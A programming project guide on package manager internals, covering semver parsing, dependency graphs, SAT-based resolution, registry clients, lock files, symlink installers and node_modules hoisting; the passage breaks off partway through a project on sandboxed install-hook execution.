PACKAGE MANAGER INTERNALS PROJECTS

Package Manager Internals: From Magic to Mastery

Goal: Understand how package managers (npm, Cargo, Homebrew, pip) work by building progressively complex components that exercise each fundamental concept.

Core Concepts You’ll Master

Package managers solve several interconnected problems:

  1. Version Parsing & Comparison - Understanding semver, comparing 1.2.3 vs 1.2.4-beta.1
  2. Constraint Satisfaction - Finding versions that satisfy ^1.2.0 AND >=1.1.5 <2.0.0
  3. Dependency Resolution - The NP-complete problem of finding compatible versions for an entire graph
  4. Registry Protocols - HTTP APIs, package metadata (“packuments”), tarballs
  5. Lock Files - Reproducible builds, integrity hashes
  6. Installation & Linking - Cellar/node_modules structures, symlinks, PATH management
  7. Caching - Avoiding re-downloads, content-addressable storage
  8. Security - Checksums, signatures, supply chain integrity

Project 1: Semver Parser & Comparator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: C, Go, TypeScript
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Parsing / String Processing
  • Software or Tool: Semver Library
  • Main Book: “Language Implementation Patterns” by Terence Parr

What you’ll build: A complete semver library that parses version strings (1.2.3-alpha.1+build.456), compares them, and evaluates range constraints (^1.2.0, >=1.0.0 <2.0.0, ~1.2.3).

Why it teaches package managers: Every package manager operation starts with parsing and comparing versions. When npm decides whether lodash@4.17.21 satisfies ^4.0.0, it’s using exactly this logic. You’ll understand why 1.0.0-alpha < 1.0.0 and how pre-release identifiers work.

Core challenges you’ll face:

  • Tokenizing version strings (split on ., -, +) → maps to lexical analysis
  • Handling pre-release precedence (1.0.0-alpha.1 vs 1.0.0-alpha.2 vs 1.0.0) → maps to comparison algorithms
  • Parsing range expressions (>=1.2.0 <2.0.0 || 3.x) → maps to recursive descent parsing
  • Operator semantics (difference between ^, ~, >=, *) → maps to domain modeling

Key Concepts:

  • Lexical Analysis: “Language Implementation Patterns” Chapter 2 - Terence Parr
  • Semantic Versioning Spec: semver.org specification - Official Spec
  • Comparison Algorithms: “Algorithms, Fourth Edition” Chapter 2 (Sorting) - Sedgewick & Wayne
  • Recursive Descent Parsing: “Writing a C Compiler” Chapter 1 - Nora Sandler

Difficulty: Intermediate. Time estimate: Weekend. Prerequisites: Basic parsing concepts, string manipulation.

Real world outcome:

$ ./semver compare 1.2.3 1.2.4
1.2.3 < 1.2.4

$ ./semver satisfies 1.2.3 "^1.0.0"
✓ 1.2.3 satisfies ^1.0.0

$ ./semver satisfies 2.0.0 "^1.0.0"
✗ 2.0.0 does NOT satisfy ^1.0.0 (major version mismatch)

$ ./semver parse 1.2.3-alpha.1+build.456
Version {
  major: 1,
  minor: 2,
  patch: 3,
  prerelease: ["alpha", 1],
  build: ["build", 456]
}

Implementation Hints:

  • Start by parsing just X.Y.Z before handling pre-release/build metadata
  • The range operators have specific meanings: ^ allows minor/patch changes, ~ allows only patch changes, * and x are wildcards
  • Pre-release versions have lower precedence than the associated normal version
  • Build metadata should be ignored when comparing versions (per spec section 10)
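
The hints above condense into a small amount of code. A minimal sketch in Python (for brevity, even though the project's main language is Rust) that parses versions and applies the precedence rules; function names are illustrative:

```python
# Parse X.Y.Z[-prerelease][+build] and compare per semver precedence.
# Build metadata is ignored; a pre-release sorts below its normal version.

def parse(v):
    core = v.split("+", 1)[0]                 # strip build metadata
    core, _, pre = core.partition("-")
    major, minor, patch = (int(x) for x in core.split("."))
    # Numeric pre-release identifiers compare numerically, others lexically.
    ids = [int(p) if p.isdigit() else p for p in pre.split(".")] if pre else []
    return (major, minor, patch, ids)

def compare(a, b):
    """Return -1, 0, or 1 as a is lower than, equal to, or higher than b."""
    pa, pb = parse(a), parse(b)
    if pa[:3] != pb[:3]:
        return -1 if pa[:3] < pb[:3] else 1
    ra, rb = pa[3], pb[3]
    if ra == rb:
        return 0
    if not ra:
        return 1                              # normal version > pre-release
    if not rb:
        return -1
    for x, y in zip(ra, rb):
        if x == y:
            continue
        if isinstance(x, int) and isinstance(y, int):
            return -1 if x < y else 1
        if isinstance(x, int):
            return -1                         # numeric < alphanumeric
        if isinstance(y, int):
            return 1
        return -1 if x < y else 1
    return -1 if len(ra) < len(rb) else 1     # shorter pre-release is lower

print(compare("1.0.0-alpha", "1.0.0"))        # -1
```

Range operators then reduce to comparisons: `^1.2.0` means `>=1.2.0 <2.0.0`, so `satisfies` is just two `compare` calls against the derived bounds.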

Learning milestones:

  1. Parse and compare basic versions → You understand tokenization
  2. Handle pre-release ordering correctly → You understand semver semantics
  3. Evaluate complex range expressions → You can build expression parsers

Project 2: Dependency Graph Builder & Cycle Detector

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, Go, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Graph Algorithms / Data Structures
  • Software or Tool: Dependency Analyzer
  • Main Book: “Algorithms, Fourth Edition” by Robert Sedgewick and Kevin Wayne

What you’ll build: A tool that reads package manifest files (package.json, Cargo.toml, or your own format), builds a directed dependency graph, detects cycles, and outputs a topological installation order.

Why it teaches package managers: Before resolving versions, package managers must understand the shape of dependencies. Circular dependencies are forbidden (or require special handling). Installation must happen in dependency order—you can’t build express before its dependencies exist.

Core challenges you’ll face:

  • Parsing manifest files (JSON/TOML) → maps to file I/O and parsing
  • Building adjacency lists (package → [dependencies]) → maps to graph representation
  • DFS-based cycle detection (finding back edges) → maps to graph traversal
  • Topological sorting (installation order) → maps to graph algorithms
  • Transitive dependency expansion (A→B→C means A needs C) → maps to graph closure

Key Concepts:

  • Graph Representations: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
  • Depth-First Search: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
  • Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
  • Cycle Detection: “Grokking Algorithms” Chapter 6 - Aditya Bhargava

Difficulty: Intermediate. Time estimate: Weekend. Prerequisites: Basic graph theory, DFS/BFS understanding.

Real world outcome:

$ ./depgraph analyze ./my-project

Dependency Graph:
my-app
├── express@^4.0.0
│   ├── body-parser@^1.0.0
│   │   └── bytes@^3.0.0
│   └── accepts@^1.0.0
└── lodash@^4.17.0

Total packages: 5
Max depth: 3

$ ./depgraph check-cycles ./circular-project
⚠️  Circular dependency detected!
   package-a → package-b → package-c → package-a

$ ./depgraph install-order ./my-project
Installation order:
1. bytes@^3.0.0
2. body-parser@^1.0.0
3. accepts@^1.0.0
4. lodash@^4.17.0
5. express@^4.0.0
6. my-app

Implementation Hints:

  • Use a dictionary/hashmap where keys are package names and values are lists of dependency names
  • For cycle detection, maintain three states during DFS: unvisited, in-progress, completed
  • A cycle exists if you visit a node that’s currently “in-progress” (a back edge)
  • Topological sort is just the reverse of DFS post-order traversal
  • Consider using Kahn’s algorithm (BFS-based) as an alternative approach
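
A hedged sketch of the three-state DFS described above, in Python (the project's main language); the input format (name → list of dependency names) matches the first hint:

```python
# Three-state DFS: WHITE = unvisited, GRAY = in progress, BLACK = done.
# A GRAY neighbor means a back edge, i.e. a circular dependency.

def install_order(graph):
    WHITE, GRAY, BLACK = 0, 1, 2
    state = {node: WHITE for node in graph}
    order = []

    def dfs(node, path):
        state[node] = GRAY
        for dep in graph.get(node, []):
            if state.get(dep, WHITE) == GRAY:
                raise ValueError("cycle: " + " -> ".join(path + [dep]))
            if state.get(dep, WHITE) == WHITE:
                dfs(dep, path + [dep])
        state[node] = BLACK
        order.append(node)        # post-order: dependencies appended first

    for node in list(graph):
        if state[node] == WHITE:
            dfs(node, [node])
    return order                  # already a valid installation order

deps = {"my-app": ["express", "lodash"],
        "express": ["body-parser"],
        "body-parser": [], "lodash": []}
print(install_order(deps))        # dependencies listed before dependents
```

Because edges here point from a package to its dependencies, the post-order itself is the installation order; reversing it gives the conventional topological order.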

Learning milestones:

  1. Build and visualize dependency graphs → You understand graph representation
  2. Detect circular dependencies → You understand DFS traversal states
  3. Generate correct installation order → You understand topological sorting

Project 3: Version Constraint SAT Solver

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, Haskell, OCaml
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 4: Expert
  • Knowledge Area: Constraint Satisfaction / Logic
  • Software or Tool: Dependency Resolver
  • Main Book: “The Art of Computer Programming, Volume 4, Fascicle 6: Satisfiability” by Donald E. Knuth

What you’ll build: A dependency resolver that translates version constraints into boolean satisfiability (SAT) clauses and uses a solver (either your own DPLL implementation or an off-the-shelf solver like PicoSAT) to find compatible versions.

Why it teaches package managers: This is the heart of modern package managers. When you have A requires B>=1.0.0 and C requires B<1.5.0 and D requires B>=1.3.0, finding B@1.4.0 is a SAT problem. Understanding this reveals why “dependency hell” is NP-complete and why resolvers sometimes take a long time.

Core challenges you’ll face:

  • Encoding constraints as CNF (Conjunctive Normal Form) → maps to propositional logic
  • At-most-one constraints (only one version of each package) → maps to cardinality constraints
  • Implementing DPLL algorithm (unit propagation, pure literal elimination) → maps to backtracking search
  • Conflict analysis and learning (why did this fail?) → maps to debugging resolution failures
  • Extracting solutions (boolean assignment → version selection) → maps to solution decoding

Key Concepts:

  • SAT Problem Definition: “The Art of Computer Programming, Vol 4 Fascicle 6” - Donald Knuth
  • DPLL Algorithm: Wikipedia: DPLL Algorithm - Classic backtracking SAT solver
  • CNF Conversion: “Concrete Mathematics” Chapter 4 - Graham, Knuth, Patashnik
  • Constraint Propagation: “Algorithms, Fourth Edition” Chapter 6 (Context) - Sedgewick & Wayne

Difficulty: Expert. Time estimate: 2-4 weeks. Prerequisites: Propositional logic, backtracking algorithms, semver (Project 1).

Real world outcome:

$ cat requirements.txt
web-framework >= 2.0.0
database-driver ^1.5.0
logger >= 1.0.0 < 3.0.0

# web-framework 2.0.0 requires logger ^2.0.0
# database-driver 1.5.0 requires logger >= 1.5.0

$ ./resolver solve requirements.txt

Resolving dependencies...
  - web-framework: 6 versions available
  - database-driver: 4 versions available
  - logger: 12 versions available

Encoding as SAT problem...
  - 22 variables (one per package-version pair)
  - 156 clauses

Running DPLL solver...
  - Propagations: 47
  - Decisions: 3
  - Conflicts: 1
  - Learned clauses: 1

✓ Solution found:
  web-framework@2.1.0
  database-driver@1.5.2
  logger@2.3.0

$ ./resolver solve impossible-requirements.txt
✗ No solution exists!
  Conflict: web-framework@2.0.0 requires logger>=2.0.0
            but old-lib@1.0.0 requires logger<2.0.0

Implementation Hints:

  • Start with a brute-force solver (try all combinations) before optimizing with DPLL
  • Each package-version pair becomes a boolean variable (e.g., lodash_4_17_0)
  • “At most one version per package” becomes pairwise exclusion clauses: ¬lodash_4_17_0 ∨ ¬lodash_4_16_0
  • Dependencies become implications: express_4_0_0 → (body_parser_1_0_0 ∨ body_parser_1_1_0 ∨ ...)
  • Consider using Python’s python-sat library for a production solver, but implement basic DPLL yourself first
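
Before DPLL, the first hint (brute force) plus the encoding hints fit in a few lines. A hedged Python sketch with illustrative package names; a clause is a list of (variable, polarity) literals:

```python
from itertools import product

def solve(variables, clauses):
    """Try every assignment; return one satisfying all clauses, else None."""
    for bits in product([False, True], repeat=len(variables)):
        assign = dict(zip(variables, bits))
        if all(any(assign[v] == pol for v, pol in c) for c in clauses):
            return assign
    return None

A1, B1, B2 = "a@1", "b@1", "b@2"
clauses = [
    [(A1, True)],                   # the root requires a@1
    [(A1, False), (B2, True)],      # a@1 -> b@2  (a@1 needs b >= 2)
    [(B1, False), (B2, False)],     # at most one version of b
]
model = solve([A1, B1, B2], clauses)
print(sorted(v for v, on in model.items() if on))   # ['a@1', 'b@2']
```

DPLL replaces the exhaustive loop with unit propagation and backtracking, but the encoding stays identical, so this baseline doubles as a correctness oracle for your solver.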

Learning milestones:

  1. Encode simple constraints as SAT → You understand the reduction
  2. Implement basic DPLL with unit propagation → You understand SAT solving
  3. Handle conflicts and report useful errors → You understand why resolution fails
  4. Solve real-world dependency graphs quickly → You understand optimization

Project 4: Package Registry Client

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Networking / HTTP APIs
  • Software or Tool: npm/crates.io Client
  • Main Book: “TCP/IP Illustrated, Volume 1” by W. Richard Stevens

What you’ll build: A client that talks to the npm registry (or crates.io) to fetch package metadata, download tarballs, verify checksums, and cache results locally.

Why it teaches package managers: This is how npm install actually gets packages. You’ll learn the registry protocol, understand why there’s both a “full” and “abbreviated” metadata format, and see how checksums ensure integrity.

Core challenges you’ll face:

  • HTTP client with proper headers (User-Agent, Accept) → maps to protocol compliance
  • Parsing “packument” JSON (package metadata format) → maps to API schemas
  • Downloading and extracting tarballs (.tgz files) → maps to file formats
  • Verifying SHA-512 integrity hashes → maps to security
  • Implementing a local cache (avoid re-downloads) → maps to caching strategies

Key Concepts:

  • HTTP Protocol: “TCP/IP Illustrated, Volume 1” Chapter 14 - W. Richard Stevens
  • REST API Design: “Design and Build Great Web APIs” Chapter 3 - Mike Amundsen
  • Checksums & Integrity: “Serious Cryptography, 2nd Edition” Chapter 5 - Jean-Philippe Aumasson
  • Caching Strategies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann

Difficulty: Intermediate. Time estimate: 1 week. Prerequisites: HTTP basics, JSON parsing, file I/O.

Real world outcome:

$ ./registry-client info lodash

Package: lodash
Latest: 4.17.21
Description: Lodash modular utilities
License: MIT
Repository: https://github.com/lodash/lodash
Versions: 114 published

$ ./registry-client download lodash 4.17.21

Fetching metadata from https://registry.npmjs.org/lodash
Found version 4.17.21
  Tarball: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
  Size: 308,599 bytes
  SHA-512: CAMj...

Downloading...  [████████████████████] 100%

Verifying integrity...
  Expected: sha512-CAMj...
  Actual:   sha512-CAMj...
  ✓ Integrity verified

Extracting to ./cache/lodash-4.17.21/
  ✓ 1,057 files extracted

$ ./registry-client search "http client"
Results for "http client":
1. axios (104M weekly downloads) - Promise based HTTP client
2. node-fetch (67M weekly downloads) - A light-weight module
3. got (23M weekly downloads) - Human-friendly HTTP request library

Implementation Hints:

  • The npm registry base URL is https://registry.npmjs.org
  • Fetch metadata with GET /package-name (full) or GET /package-name/version (specific version)
  • The dist field in version metadata contains tarball URL and integrity hash
  • Use Accept: application/vnd.npm.install-v1+json header for abbreviated metadata
  • For crates.io, the protocol is different: it historically used a git-based index at https://github.com/rust-lang/crates.io-index (newer Cargo releases default to a sparse HTTP index)
  • Implement ETag-based caching to avoid re-downloading unchanged metadata
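
A hedged sketch of the metadata fetch and integrity check, in Python rather than the project's Go, for brevity. The Accept header and the sha512-base64 integrity format follow the hints above; the client name is illustrative:

```python
import base64, hashlib, json, urllib.request

REGISTRY = "https://registry.npmjs.org"

def fetch_metadata(name):
    """Fetch the abbreviated packument for a package."""
    req = urllib.request.Request(
        f"{REGISTRY}/{name}",
        headers={"Accept": "application/vnd.npm.install-v1+json",
                 "User-Agent": "toy-registry-client/0.1"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def verify_integrity(data: bytes, integrity: str) -> bool:
    """Check an npm-style integrity string: '<algo>-<base64 digest>'."""
    algo, _, expected = integrity.partition("-")
    actual = base64.b64encode(hashlib.new(algo, data).digest()).decode()
    return actual == expected

blob = b"pretend tarball bytes"
good = "sha512-" + base64.b64encode(hashlib.sha512(blob).digest()).decode()
print(verify_integrity(blob, good))         # True
print(verify_integrity(b"tampered", good))  # False
```

The `dist.integrity` field from the version metadata plugs straight into `verify_integrity` after the tarball download.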

Learning milestones:

  1. Fetch and parse package metadata → You understand the registry protocol
  2. Download and verify tarballs → You understand integrity checking
  3. Implement caching with ETags → You understand efficient API usage

Project 5: Lock File Generator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Reproducible Builds / Hashing
  • Software or Tool: Lock File System
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A system that, after dependency resolution, generates a lock file recording exact versions, download URLs, and integrity hashes—then can reinstall from the lock file without re-resolving.

Why it teaches package managers: Lock files are why npm ci and cargo build are deterministic. Without them, builds are non-reproducible. You’ll understand the difference between “loose” requirements (package.json) and “locked” reality (package-lock.json).

Core challenges you’ll face:

  • Capturing resolved state (exact versions, not ranges) → maps to state serialization
  • Recording integrity hashes (SHA-512 for each package) → maps to content-addressable storage
  • Detecting lock file staleness (manifest changed since lock) → maps to change detection
  • Partial updates (add one package without re-resolving everything) → maps to incremental computation
  • Cross-platform reproducibility (same lock file, same result everywhere) → maps to deterministic builds

Key Concepts:

  • Content Addressing: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
  • Cryptographic Hashes: “Serious Cryptography, 2nd Edition” Chapter 5 - Aumasson
  • Reproducible Builds: reproducible-builds.org - Community standard
  • JSON/TOML Serialization: “Fluent Python” Chapter 4 (for concepts) - Luciano Ramalho

Difficulty: Advanced. Time estimate: 1-2 weeks. Prerequisites: Projects 1-4 (semver, graphs, resolver, registry client).

Real world outcome:

$ cat mypackage.toml
[dependencies]
web-framework = "^2.0.0"
database = "^1.5.0"

$ ./lockgen generate mypackage.toml

Resolving dependencies...
Fetching package metadata...
Generating lock file...

✓ Created mypackage.lock

$ cat mypackage.lock
# Auto-generated lock file. Do not edit.
# Generated: 2025-01-15T10:30:00Z

[[package]]
name = "web-framework"
version = "2.1.3"
source = "https://registry.example.com/web-framework-2.1.3.tgz"
integrity = "sha512-abc123..."
dependencies = ["logger@2.0.0"]

[[package]]
name = "logger"
version = "2.0.0"
source = "https://registry.example.com/logger-2.0.0.tgz"
integrity = "sha512-def456..."
dependencies = []

[[package]]
name = "database"
version = "1.5.2"
source = "https://registry.example.com/database-1.5.2.tgz"
integrity = "sha512-ghi789..."
dependencies = []

$ ./lockgen install --from-lock mypackage.lock

Installing from lock file (no resolution needed)...
  ✓ logger@2.0.0 (cached)
  ✓ web-framework@2.1.3 (downloading...)
  ✓ database@1.5.2 (cached)

All packages installed. Integrity verified.

$ ./lockgen check mypackage.toml mypackage.lock
✓ Lock file is up-to-date with manifest

Implementation Hints:

  • The lock file should contain: package name, exact version, download URL, integrity hash, and resolved dependencies
  • Use SHA-512 (like npm) or SHA-256 (like Cargo) for integrity hashes
  • Detect staleness by hashing the manifest file and storing that hash in the lock file
  • For partial updates, only re-resolve the changed subtree of the dependency graph
  • Consider supporting both JSON and TOML formats (npm uses JSON, Cargo uses TOML)
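
The staleness hint can be sketched directly. A hedged Python sketch; the field names in the lock structure are illustrative, not npm's or Cargo's:

```python
import hashlib

def manifest_hash(manifest_text: str) -> str:
    return "sha256-" + hashlib.sha256(manifest_text.encode()).hexdigest()

def make_lock(manifest_text, resolved_packages):
    # resolved_packages: exact versions, sources, and integrity hashes
    return {"manifest_hash": manifest_hash(manifest_text),
            "packages": resolved_packages}

def is_stale(manifest_text, lock):
    return lock["manifest_hash"] != manifest_hash(manifest_text)

lock = make_lock('web-framework = "^2.0.0"',
                 [{"name": "web-framework", "version": "2.1.3"}])
print(is_stale('web-framework = "^2.0.0"', lock))  # False: up to date
print(is_stale('web-framework = "^3.0.0"', lock))  # True: manifest changed
```

On install, a fresh lock means "skip resolution, download exactly what's listed"; a stale one means re-resolve and regenerate.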

Learning milestones:

  1. Generate lock files after resolution → You understand state capture
  2. Install purely from lock file → You understand reproducibility
  3. Detect and handle manifest changes → You understand incremental updates

Project 6: Cellar-Style Package Installer

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Go, Python
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Filesystem / Symlinks
  • Software or Tool: Package Installer (Homebrew-style)
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: An installer that extracts packages into versioned directories (like Homebrew’s Cellar: /usr/local/Cellar/pkg/1.2.3/) and creates symlinks to a common prefix (/usr/local/bin/), supporting multiple versions and atomic switching.

Why it teaches package managers: This is how Homebrew achieves clean installs, easy rollbacks, and multiple versions. You’ll understand why symlinks are powerful, how PATH works, and why “just copying files” isn’t enough.

Core challenges you’ll face:

  • Versioned directory structure (Cellar layout) → maps to filesystem organization
  • Creating relative symlinks (portable across machines) → maps to symlink mechanics
  • Atomic version switching (switch from v1.0 to v2.0 safely) → maps to atomic operations
  • Handling conflicts (two packages provide same binary) → maps to conflict resolution
  • Uninstallation without orphans (clean removal) → maps to reference tracking

Key Concepts:

  • Symlinks & Hard Links: “The Linux Programming Interface” Chapter 18 - Michael Kerrisk
  • Atomic File Operations: “The Linux Programming Interface” Chapter 5 - Michael Kerrisk
  • Filesystem Hierarchy: “How Linux Works, 3rd Edition” Chapter 4 - Brian Ward
  • Homebrew Architecture: Formula Cookbook - Official docs

Difficulty: Advanced. Time estimate: 1-2 weeks. Prerequisites: Filesystem operations, symlink concepts, shell/PATH understanding.

Real world outcome:

$ ./cellar install ./packages/vim-9.0.0.tgz

Installing vim@9.0.0...
  Creating /usr/local/Cellar/vim/9.0.0/
  Extracting 127 files...

Linking vim@9.0.0...
  /usr/local/bin/vim → ../Cellar/vim/9.0.0/bin/vim
  /usr/local/bin/vimdiff → ../Cellar/vim/9.0.0/bin/vimdiff
  /usr/local/share/man/man1/vim.1 → ../../Cellar/vim/9.0.0/share/man/man1/vim.1

✓ vim@9.0.0 installed and linked

$ ls -la /usr/local/bin/vim
lrwxr-xr-x  1 user  staff  /usr/local/bin/vim -> ../Cellar/vim/9.0.0/bin/vim

$ ./cellar install ./packages/vim-9.1.0.tgz

Installing vim@9.1.0...
  ✓ Installed to /usr/local/Cellar/vim/9.1.0/

Switching vim 9.0.0 → 9.1.0...
  Unlinking 9.0.0...
  Linking 9.1.0...
  ✓ Switched

$ ./cellar list
vim 9.0.0 (unlinked)
vim 9.1.0 (linked)

$ ./cellar switch vim 9.0.0
Switching vim 9.1.0 → 9.0.0...
  ✓ Now using vim@9.0.0

$ ./cellar uninstall vim 9.0.0
Uninstalling vim@9.0.0...
  Removing /usr/local/Cellar/vim/9.0.0/ (127 files)
  ✓ Removed

Implementation Hints:

  • Cellar structure: $PREFIX/Cellar/$NAME/$VERSION/{bin,lib,share,...}
  • Always use relative symlinks (../Cellar/...) not absolute (/usr/local/Cellar/...) for portability
  • Use symlink() system call (or language equivalent) to create links
  • For atomic switching, create new links with temporary names, then rename() over old links
  • Track installed files in a manifest (e.g., $PREFIX/Cellar/vim/9.0.0/.MANIFEST) for clean uninstall
  • Handle the case where /usr/local/bin/ doesn’t exist yet
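
The atomic-switch hint looks like this in practice. A hedged sketch in Python rather than the project's C (the underlying symlink()/rename() calls are the same); the paths are illustrative:

```python
import os

def atomic_link(target: str, link_path: str):
    """Point link_path at target with no window where the link is missing."""
    tmp = link_path + ".tmp"
    if os.path.lexists(tmp):
        os.remove(tmp)               # clear any stale temp link
    os.symlink(target, tmp)          # create the new link under a temp name
    os.replace(tmp, link_path)       # rename() over the old link: atomic on POSIX

# Illustrative usage, with a relative target for portability:
# atomic_link("../Cellar/vim/9.1.0/bin/vim", "/usr/local/bin/vim")
```

A plain unlink-then-symlink sequence leaves a moment where `vim` resolves to nothing; the rename-over approach does not.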

Learning milestones:

  1. Install to versioned directories → You understand Cellar structure
  2. Create and manage symlinks → You understand the linking layer
  3. Atomically switch versions → You understand transactional installs
  4. Clean uninstall with no orphans → You understand reference tracking

Project 7: node_modules Hoisting Simulator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: TypeScript
  • Alternative Programming Languages: Python, Go, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Tree Algorithms / Package Layout
  • Software or Tool: npm/pnpm Simulator
  • Main Book: “Data Structures the Fun Way” by Jeremy Kubica

What you’ll build: A tool that takes a resolved dependency graph and produces an optimized node_modules layout, demonstrating npm’s hoisting algorithm and pnpm’s content-addressable approach.

Why it teaches package managers: npm’s node_modules structure is famously complex. Why is it often 500MB? Why do you sometimes get duplicate packages? Why does pnpm use symlinks differently? This project reveals the tradeoffs.

Core challenges you’ll face:

  • Hoisting algorithm (move deps up when possible) → maps to tree optimization
  • Handling duplicate versions (when hoisting fails) → maps to space vs correctness tradeoff
  • Phantom dependencies (accessing unhoisted packages) → maps to encapsulation violations
  • pnpm’s content-addressable store (hardlinks to global cache) → maps to deduplication
  • Flat vs nested layouts (yarn vs npm v2 vs npm v7) → maps to algorithm comparison

Key Concepts:

  • Tree Traversal: “Data Structures the Fun Way” Chapter 6 - Jeremy Kubica
  • npm Hoisting: npm docs: how npm3 works - Official npm docs
  • pnpm’s Approach: pnpm.io/motivation - Why pnpm exists
  • Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann

Difficulty: Advanced. Time estimate: 1-2 weeks. Prerequisites: Tree data structures, npm/node basics.

Real world outcome:

$ cat resolved-deps.json
{
  "my-app": {
    "deps": {
      "express": "4.18.0",
      "lodash": "4.17.21"
    }
  },
  "express": {
    "deps": {
      "body-parser": "1.20.0",
      "lodash": "4.17.21"
    }
  },
  "body-parser": {
    "deps": {
      "lodash": "4.17.15"
    }
  }
}

$ ./hoister simulate --algorithm=npm resolved-deps.json

npm-style Layout (hoisted):
node_modules/
├── express/
├── lodash/ (4.17.21, hoisted)
├── body-parser/
│   └── node_modules/
│       └── lodash/ (4.17.15, nested - conflicts with hoisted)
└── .package-lock.json

Analysis:
  Total packages: 4
  Hoisted: 3
  Nested duplicates: 1 (lodash has conflicting versions)
  Disk usage: ~2.1 MB

$ ./hoister simulate --algorithm=pnpm resolved-deps.json

pnpm-style Layout (symlinks + store):
node_modules/
├── .pnpm/
│   ├── express@4.18.0/
│   │   └── node_modules/
│   │       ├── express/ → <hardlink to store>
│   │       ├── body-parser/ → ../../body-parser@1.20.0/...
│   │       └── lodash/ → ../../lodash@4.17.21/...
│   ├── body-parser@1.20.0/
│   │   └── node_modules/
│   │       ├── body-parser/ → <hardlink to store>
│   │       └── lodash/ → ../../lodash@4.17.15/...
│   ├── lodash@4.17.21/
│   └── lodash@4.17.15/
├── express/ → .pnpm/express@4.18.0/node_modules/express
└── lodash/ → .pnpm/lodash@4.17.21/node_modules/lodash

Analysis:
  Total packages: 4
  Store entries: 4 (deduplicated globally)
  Disk usage: ~1.8 MB (shared across projects)
  No phantom dependency access possible ✓

Implementation Hints:

  • npm hoisting: for each package, try to place it at the highest possible level where no version conflict exists
  • A conflict occurs when two versions of the same package would occupy the same path
  • pnpm creates a flat store (.pnpm/name@version/) and symlinks from nested node_modules
  • The key insight: pnpm’s layout enforces that packages can only access their declared dependencies
  • Consider also implementing Yarn’s plug’n’play (PnP) layout which avoids node_modules entirely
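
The hoisting rule in the first two hints can be sketched with a first-come-wins policy (real npm is more elaborate, so treat this as illustrative). In Python for brevity:

```python
def hoist(resolved):
    """resolved: dict of parent -> {dep_name: version}.
    Returns (root, nested): top-level packages and per-parent nested copies."""
    root, nested = {}, {}
    for parent, deps in resolved.items():
        for name, version in deps.items():
            if root.get(name, version) == version:
                root[name] = version                   # hoist to the top
            else:                                      # version conflict:
                nested.setdefault(parent, {})[name] = version  # nest it
    return root, nested

resolved = {
    "my-app": {"express": "4.18.0", "lodash": "4.17.21"},
    "express": {"body-parser": "1.20.0", "lodash": "4.17.21"},
    "body-parser": {"lodash": "4.17.15"},
}
root, nested = hoist(resolved)
print(root)    # express, body-parser, and lodash@4.17.21 at the top level
print(nested)  # {'body-parser': {'lodash': '4.17.15'}}
```

Which version wins the hoisted slot depends on traversal order, which is exactly why a naive hoister can produce different layouts on different runs.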

Learning milestones:

  1. Implement basic hoisting → You understand npm’s approach
  2. Handle version conflicts correctly → You understand why duplicates exist
  3. Implement pnpm’s symlink layout → You understand the alternative
  4. Compare disk usage and access patterns → You understand the tradeoffs

Project 8: Build Script Executor (Pre/Post Install Hooks)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, Node.js
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Process Management / Security
  • Software or Tool: Install Hook Runner
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: A sandboxed executor for package install scripts (preinstall, postinstall, etc.) that runs build commands, handles native compilation, and implements security policies.

Why it teaches package managers: Many packages need to compile native extensions (like node-gyp for C++ addons) or run setup scripts. This is also a major security vector—malicious packages have used postinstall scripts for attacks. You’ll understand both the necessity and the danger.

Core challenges you’ll face:

  • Running child processes (spawn, wait, capture output) → maps to process management
  • Environment variable setup (PATH, npm_config_* variables, etc.) → maps to environment configuration
  • Handling native builds (detecting compiler, platform-specific flags) → maps to build systems
  • Sandboxing for security (limit filesystem/network access) → maps to security policies
